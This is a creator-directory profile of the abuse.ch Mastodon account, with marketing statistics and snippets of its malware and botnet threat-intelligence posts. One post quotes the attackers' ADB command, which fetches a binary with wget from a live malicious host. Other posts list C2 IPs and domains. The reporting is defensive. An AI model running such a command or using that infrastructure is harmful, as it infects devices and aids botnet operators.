LIVE
1.77M influencer listings 🏢28.7K sponsor listings 🌍49.81B combined audience reach 📊13 platforms indexed 🗺️130+ countries covered 🏷️10,000+ niches 🟣685.7K Twitch creators 🦋472.6K Bluesky creators 🎙️247.6K podcast creators 🐘137.6K Mastodon creators ▶️71.9K YouTube creators 🥊60.8K Kick creators ✈️46.4K Telegram creators 𝕏26.9K X creators 🎵13.3K TikTok creators 🎮4.9K Discord creators 🎬3K Rumble creators 🧵1.1K Threads creators 1.77M influencer listings 🏢28.7K sponsor listings 🌍49.81B combined audience reach 📊13 platforms indexed 🗺️130+ countries covered 🏷️10,000+ niches 🟣685.7K Twitch creators 🦋472.6K Bluesky creators 🎙️247.6K podcast creators 🐘137.6K Mastodon creators ▶️71.9K YouTube creators 🥊60.8K Kick creators ✈️46.4K Telegram creators 𝕏26.9K X creators 🎵13.3K TikTok creators 🎮4.9K Discord creators 🎬3K Rumble creators 🧵1.1K Threads creators
abuse.ch :verified:

abuse.ch :verified:

🔄 Data last refreshed 8 hours ago
🤝

Make a deal with abuse.ch :verified:

🔒 Paid proposals held safely in escrow — released only when the work's approved.

Every booking is a normal escrow-protected deal.

Followers
2.3K
Account age
3 yrs
🧰 Free analysis for abuse.ch :verified:
🕵️ Fake follower check 📊 Engagement rate 💰 What they charge

Known for

Our platforms were recently targeted by a large-scale web scraping operation originating from devices that are apparently participating in residential proxy networks 🏘️ 🖥️ . The vast majority of these requests were successfully blocked by our existing mitigations 🛑 . However, the sheer volume of traffic caused temporary disruptions to both the MalwareBazaar and URLhaus platforms ⚠️
To put the scal22 views Our platforms were recently targeted by a large-scale web scraping operation originating from devices that are apparently participating in residential proxy networks 🏘️ 🖥️ . The vast majority of these requests were successfully blocked by our existing mitigations 🛑 . However, the sheer volume of traffic caused temporary disruptions to both the MalwareBazaar and URLhaus platforms ⚠️ To put the scal It's here!! The @abuse_ch #CommunityHub is LIVE 🔥🔥🔥
Now you can access a LIVE view of:
➡️ Total community contributions
➡️ Top 10 Leaderboards 
➡️ Monthly contribution trends
....and a place to track your own impact!
Our community is bigger than any one platform. It's a global network of researchers working together to disrupt malware, botnets, and cybercrime.
And every contributor deserves recogn13 views It's here!! The @abuse_ch #CommunityHub is LIVE 🔥🔥🔥 Now you can access a LIVE view of: ➡️ Total community contributions ➡️ Top 10 Leaderboards ➡️ Monthly contribution trends ....and a place to track your own impact! Our community is bigger than any one platform. It's a global network of researchers working together to disrupt malware, botnets, and cybercrime. And every contributor deserves recogn Interesting unlabeled malware sample shared by our friend smica83, apparently targeting UA users 🇺🇦🕵️
The malware sample:
1️⃣  Obtains the DNS A record of ns2.theendlessweb .com
2️⃣  Queries directly the DNS A record (207.90.251 .10) for the DNS TXT record of sni13.docsmanagement.endl .site
3️⃣  207.90.251 .10 returns a PowerShell command as part of the DNS TXT record
4️⃣  Malware executes the PS 12 views Interesting unlabeled malware sample shared by our friend smica83, apparently targeting UA users 🇺🇦🕵️ The malware sample: 1️⃣ Obtains the DNS A record of ns2.theendlessweb .com 2️⃣ Queries directly the DNS A record (207.90.251 .10) for the DNS TXT record of sni13.docsmanagement.endl .site 3️⃣ 207.90.251 .10 returns a PowerShell command as part of the DNS TXT record 4️⃣ Malware executes the PS Botnet C2 tied to an unidentified #malware family trying to hide as FortiGate device 😜
🌐 Domain: az2030port.duckdns .org
📡 C2: 178.16.55.28:2030 ➡️ Omegatech LTD🇳🇱
🔐 SSL certificate: FortiGate, O=Fortinet Ltd.
Corresponding malware samples ⤵️
https://hunting.abuse.ch/hunt/6a285c89c73e5/178.16.55.28/9 views Botnet C2 tied to an unidentified #malware family trying to hide as FortiGate device 😜 🌐 Domain: az2030port.duckdns .org 📡 C2: 178.16.55.28:2030 ➡️ Omegatech LTD🇳🇱 🔐 SSL certificate: FortiGate, O=Fortinet Ltd. Corresponding malware samples ⤵️ https://hunting.abuse.ch/hunt/6a285c89c73e5/178.16.55.28/

📊 Post engagement

8
Avg engagement / post
0.4%
Engagement vs followers
Nov 2022
On Mastodon since

🔥 Top post: Our platforms were recently targeted by a large-scale web scrapi · 22 likes + reposts

📊 Activity & format

Posting cadence
0.54 / week
A lower-frequency account — each post lands with more weight.
Content mix
Mostly images
Recent: 2 text · 9 image · 1 video.
Follower / following
44×
Follows 51 back. A strong ratio — an audience that follows them, not a follow-for-follow network.
🔥 Top post Our platforms were recently targeted by a large-scale web scraping operation originating from devices that are apparently participating in residential proxy networks 🏘️ 🖥️ . The vast majority of these requests were successfully blocked by our existing mitigations 🛑 . However, th… ★ 22
📢 SERVICE UPDATE | As you may have noticed, we've experienced some downtime recently which was largely caused by a small number of users exceeding our Fair Use Policy. To protect platform stability and ensure fair access for everyone as o… ★ 8 It's here!! The @abuse_ch #CommunityHub is LIVE 🔥🔥🔥 Now you can access a LIVE view of: ➡️ Total community contributions ➡️ Top 10 Leaderboards ➡️ Monthly contribution trends ....and a place to track your own impact! Our community is bigge… ★ 13 JackSkid malware spreading from 46.151.178.13 (SINOWORLDWIDE 🇳🇱) on exposed devices running Android Debug Bridge (ADB) ⤵️ ADB command: ⚙️ shell:busybox wget http://94.154.43 .48/rebirth.arm7 -O /data/local/tmp/com.supercell.clashroyal; chm… ★ 4 Interesting unlabeled malware sample shared by our friend smica83, apparently targeting UA users 🇺🇦🕵️ The malware sample: 1️⃣ Obtains the DNS A record of ns2.theendlessweb .com 2️⃣ Queries directly the DNS A record (207.90.251 .10) for t… ★ 12 Something new is coming for abuse.ch contributors... watch this space! 👀 #ComingSoon #CommunityHub #SharingIsCaring 😻🥇💛 ★ 8 RE: https://infosec.exchange/@spamhaus/116804685911276876 New loader in town SolarisLoader spotted by @spamhaus and abuse.ch 🔥 📡 SolarisLoader IOCs (botnet C2 servers): https://threatfox.abuse.ch/browse/tag/SolarisLoader/ 📄 SolarisLoader m… ★ 4 Botnet C2 tied to an unidentified #malware family trying to hide as FortiGate device 😜 🌐 Domain: az2030port.duckdns .org 📡 C2: 178.16.55.28:2030 ➡️ Omegatech LTD🇳🇱 🔐 SSL certificate: FortiGate, O=Fortinet Ltd. Corresponding malware samples… ★ 9 My favorite Remus botnet C2 domain so far 😄 havelbeenpwned .net ⤵️ NICENIC INTERNATIONAL🇨🇳 103.211.219.238:4219⤵️ AS394695 PUBLIC-DOMAIN-REGISTRY 🇮🇳 Malware sample: https://bazaar.abuse.ch/sample/75fce6ec4b0815d7ccc9d87c2687c3c379c8e44673… ★ 7 Malspam 📧 targeting Spanish users 🇪🇸 Email ➡️ geo filter ➡️ mediafire ➡️ iso ➡️ vbs 1st stage - geo filter 🛑 vmi3228488.contaboserver .net Contabo 🇩🇪 2nd stage - payload 📄 https://urlhaus.abuse.ch/url/3824487/ Dropped iso: https://bazaar.a… ★ 2 SparkRAT ➡️ ChromeSetup.msi ➡️ FUD 🔥 msftconnecttest .xyz ⤵️ Creation Date: 2024-12-02 ⤵️ After more than a year, this domain still has a detection rate of 1/93 🤯 Pointing to ⤵️ 154.31.222.217:443 ➡️ DControl Chinese? 🇨🇳 lang="zh-cn" Malwa… ★ 1 Proofpoint recently identified a fake RMM (Remote Monitoring and Management Tool) called #TrustConnect and #DocConnect🔎💻 Pivoting the threat in our collection reveals that the threat actors spread the same malware under additional names, i… ★ 8

🐘 Community & instance

Home server
ioc.exchange
A threat-intel & infosec server — its members and audience skew toward that niche, so expect a community-aligned, engaged following.
✅ Link-verified
Verified link
Proved ownership of a website linked on their profile — Mastodon's green-check verification, a real identity signal rather than a paid badge.
On Mastodon since
Nov 2022
Joined in the Twitter-exodus wave of late 2022 — part of the migration that made Mastodon a real destination.

💡 Facts

🗓️Joined Mastodon in 2022 — 3 years ago.
👁️Averages 8 views per post.
📤Posts about 0.5× per week.

🛡️ Audience credibility

81/100
Excellent Credibility score
97%
Real Real audience
Low Fake-follower risk
High Data confidence
  • Est. 97% real, active audience · Low fake-follower risk.
  • Engagement (~0.4% of followers engage each post) is around typical for Mastodon.
  • Organic base — far more followers than accounts it follows.
  • Verified account.
  • Established account (3+ years old).

Heuristic estimate from engagement, follower ratios, account age & growth — a screening signal, not a guarantee.

About

#cybersecurity - Fighting #malware and #botnets

📸 Gallery

✉ Message abuse.ch :verified:

Reaching out to influencers is a Pro feature. Upgrade to message any influencer directly — perfect for brands and agencies booking sponsorships.

See Pro $9.95/mo →

Already Pro? Log in.

🎤 Event / appearance with abuse.ch :verified:

Booking an event / appearance is a Pro feature. Upgrade to book abuse.ch :verified: for an in-person or virtual appearance — payment held safely in escrow until the event is done.

See Pro $9.95/mo →

Already Pro? Log in.